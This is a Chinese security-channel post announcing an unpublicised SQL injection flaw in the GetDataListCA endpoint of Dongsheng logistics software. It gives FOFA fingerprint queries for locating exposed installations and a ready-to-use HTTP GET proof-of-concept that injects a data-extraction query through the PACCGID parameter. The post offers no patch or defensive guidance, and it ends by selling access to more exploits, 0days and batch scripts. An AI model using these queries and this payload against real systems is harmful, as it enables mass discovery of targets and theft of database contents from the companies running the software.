漏洞推送|【未公开】东胜物流软件GetDataListCA存在SQL注入漏洞

漏洞推送|【未公开】东胜物流软件GetDataListCA存在SQL注入漏洞

原创 小白菜 小白菜安全 2024-11-12 18:45

漏洞描述

东胜物流软件是一款致力于为客户提供IT支撑的 SOP, 帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。东胜物流软件
GetDataListCA
接口处存在 SQL 注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

资产信息

fofa
:
body=
“FeeCodes/CompanysAdapter.aspx”
|| body=
“dhtmlxcombo_whp.js”
|| body=
“dongshengsoft”
|| body=
“theme/dhtmlxcombo.css”

漏洞复现

POC

GET /MvcShipping/MsCwGenlegAccitems/GetDataListCA?PACCGID=AND%20[RANDNUM]%20IN%20(SELECT%20(%27[qwer1234]%27+([QUERY])+%27[DELIMITER_STOP]%27))&id=35915ECC-772B-404D-B3AC-0D7E8F1CB4F1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Priority: u=0, i

更多漏洞poc(包括0day漏洞)、安全工具、批量脚本加入内部圈子获取,目前只要49,无理由3天退款,加入圈子请扫描下方二维码。

漏洞文库:

工具收集:

脚本文库:

免责声明

该公众号主要是分享互联网上公开的一些漏洞poc和工具,
利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如果本公众号分享导致的侵权行为请告知,我们会立即删除并道歉。